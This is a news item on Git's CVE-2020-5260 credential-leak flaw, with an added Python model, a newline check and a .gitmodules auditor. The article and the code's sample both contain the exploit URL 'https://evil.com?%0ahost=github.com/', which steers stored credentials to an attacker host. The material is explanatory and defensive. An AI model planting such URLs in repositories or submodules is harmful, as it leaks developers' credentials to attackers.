Vulnerability in Git leading to leaked credentials

Corrective releases of the distributed source control system Git have been published: 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 and 2.17.4. They fix a vulnerability (CVE-2020-5260) in the "credential.helper" handler that causes credentials to be sent to the wrong host when the git client accesses a repository using a specially crafted URL containing a newline character. The vulnerability can be used to send credentials for another host to a server controlled by an attacker.

When specifying a URL like "https://evil.com?%0ahost=github.com/", the credential handler will pass the authentication parameters set for github.com when connecting to the evil.com host. The problem appears when performing operations such as "git clone", including when processing URLs for submodules (for example, when doing "git submodule update" the URLs set in the .gitmodules file from the repository will be automatically processed). The vulnerability is most dangerous in situations where a developer clones a repository without seeing the URL, for example, when working with submodules, or in systems that perform automatic actions, for example, in package build scripts.

To block the vulnerability, the new versions prohibit newline characters in any value passed through the credential exchange protocol. For distributions, you can follow the release of package updates on the pages for Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch and FreeBSD.
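The following is an added example, not code from Git or from the original article: a simplified Python model of why a newline inside a decoded URL changes the host a credential helper sees, the newline check described above, and an audit of .gitmodules text before submodules are fetched. The function names, the "last key wins" helper behaviour and the sample .gitmodules content are assumptions of this model.

```python
# Added example: simplified model of the credential exchange, not Git's own code.
from urllib.parse import unquote

def split_url(url):
    """Split scheme://host/path and percent-decode each part (simplified)."""
    protocol, _, rest = url.partition("://")
    host, _, path = rest.partition("/")
    return {"protocol": protocol, "host": unquote(host), "path": unquote(path)}

def serialize_unchecked(fields):
    """Pre-fix behaviour: emit key=value lines without validating values."""
    return "".join(f"{k}={v}\n" for k, v in fields.items() if v)

def serialize_checked(fields):
    """Fixed behaviour as the article describes it: no newline in any value."""
    for key, value in fields.items():
        if "\n" in value:
            raise ValueError(f"newline in credential field {key!r}")
    return serialize_unchecked(fields)

def helper_view(payload):
    """Fields as a line-oriented helper reads them; a repeated key overwrites
    the earlier value (assumption of this model)."""
    seen = {}
    for line in payload.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            seen[key] = value
    return seen

def flag_gitmodules(text):
    """Return submodule URLs whose percent-decoded form contains a newline."""
    flagged = []
    for line in text.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep and key.strip() == "url" and "\n" in unquote(value):
            flagged.append(value.strip())
    return flagged

# Constructed .gitmodules content; the second URL is the one quoted in the article.
SAMPLE_GITMODULES = (
    '[submodule "lib"]\n\tpath = lib\n\turl = https://example.org/lib.git\n'
    '[submodule "docs"]\n\tpath = docs\n\turl = https://evil.com?%0ahost=github.com/\n'
)

if __name__ == "__main__":
    fields = split_url("https://evil.com?%0ahost=github.com/")
    print(helper_view(serialize_unchecked(fields)))
    print(flag_gitmodules(SAMPLE_GITMODULES))
```

Running flag_gitmodules over a repository's .gitmodules before "git submodule update" gives a quick check on systems that cannot be upgraded immediately.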

As a workaround, it is recommended not to use credential.helper when accessing public repositories, and not to use "git clone" in "--recurse-submodules" mode with unchecked repositories. To completely disable the credential.helper handler, which saves and retrieves passwords from a cache, protected storage or a password file, you can use the commands:

git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper

Source: opennet.ru
